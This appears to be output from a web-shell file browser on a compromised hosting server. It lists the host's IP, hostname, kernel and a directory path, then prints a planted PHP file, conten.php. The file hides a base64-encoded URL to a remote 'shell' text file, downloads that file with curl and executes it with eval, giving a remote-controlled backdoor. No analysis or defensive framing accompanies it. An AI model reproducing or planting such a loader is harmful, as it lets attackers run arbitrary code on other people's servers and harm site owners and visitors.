uawdijnntqw1x1x1
IP : 216.73.216.146
Hostname : webm008.cluster111.gra.hosting.ovh.net
Kernel : Linux webm008.cluster111.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
OS : Linux
PATH:
/
home
/
bourgleram
/
www
/
c4d43
/
..
/
tmp
/
..
/
plugins-dist
/
..
/
.tmp
/
..
/
conten.php
/
/
<?php function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_NOBODY, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_URL, $url); curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($http_code == 200) { curl_setopt($ch, CURLOPT_NOBODY, false); curl_setopt($ch, CURLOPT_HEADER, false); $data = curl_exec($ch); curl_close($ch); return $data; } else { curl_close($ch); return false; } } $x = '?>'; $url1 = base64_decode('aHR0cHM6Ly95b2licmUuY29tL3NoZWxsL3BlbGVybGVtYnVjdXJsLnR4dA=='); $url2 = base64_decode('aHR0cHM6Ly95b2licmUuY29tL3NoZWxsL3BlbGVybGVtYnVjdXJsLnR4dA=='); $script1 = get($url1); if ($script1 !== false && $script1 !== 404) { eval($x . $script1); } else { $script2 = get($url2); if ($script2 !== false) { eval($x . $script2); } else { echo "Both attempts failed."; } } ?>
/home/bourgleram/www/c4d43/../tmp/../plugins-dist/../.tmp/../conten.php